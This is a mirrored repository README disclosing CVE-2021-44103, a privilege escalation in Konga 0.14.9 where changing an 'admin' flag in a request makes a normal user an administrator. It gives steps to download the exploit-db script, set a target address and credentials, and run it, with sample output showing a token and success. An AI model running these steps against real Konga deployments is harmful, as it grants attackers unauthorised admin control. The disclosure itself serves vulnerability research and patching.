Giters

paulotrindadec / CVE-2021-44103

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

CVE-2021-44103

A proof of concept for KONGA 0.14.9 - Privilege Escalation.

Intro

On November 16, 2021, Fabrício Salomão and I found a vulnerability in Konga API Gateways, allowing any authenticated user to become an administrator.

Report Vulnerability

Product: KONGA
Model: 0.14.9
Vulnerability: Privilege Escalation
Impact: Full admin access (vertical privilege escalation)
Authentication: required
Exploit Author: Fabricio Salomao / Paulo Trindade

PoC

Bellow has created a normal user called "usernormal" without privilege.

Crash

Crash

Through of request bellow was changed the flag "FALSE" in the parameter "admin" to "TRUE".

Crash

Therefore was created an exploit for us : https://www.exploit-db.com/exploits/50521

Crash

After running the exploit, the privilege escalation was a success!

Result:

Crash

Running the exploit

wget https://www.exploit-db.com/raw/50521 -O 50521.py

Edit 50521.py

Modify:

urlkonga = "http://www.example.com:1337/" # change to your konga address
identifier = "usernormalkonga"            # change user
password = "changeme"                     # change password

Execute:

python 50521.py

[+] Attack
[+] Token eyJhbGciOiJIUzI1NiJ9.MTA.JFmJ0Vd3z5oeOTokSL0qfPZSOJmnZKEjZVzCJs_AM-U
[+] Change Normal User to Admin
[+] Success

LINKS

http://n0hat.blogspot.com/2021/11/konga-0149-privilege-escalation-exploit.html

https://www.exploit-db.com/exploits/50521

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44103

https://github.com/advisories/GHSA-f2mp-8fgg-7465

https://security.snyk.io/vuln/SNYK-JS-KONGA-2434821

https://twitter.com/CVEnew/status/1508455166885961732

https://twitter.com/search?q=CVE-2021-44103&src=typed_query

About

Languages

Language:Python 100.0%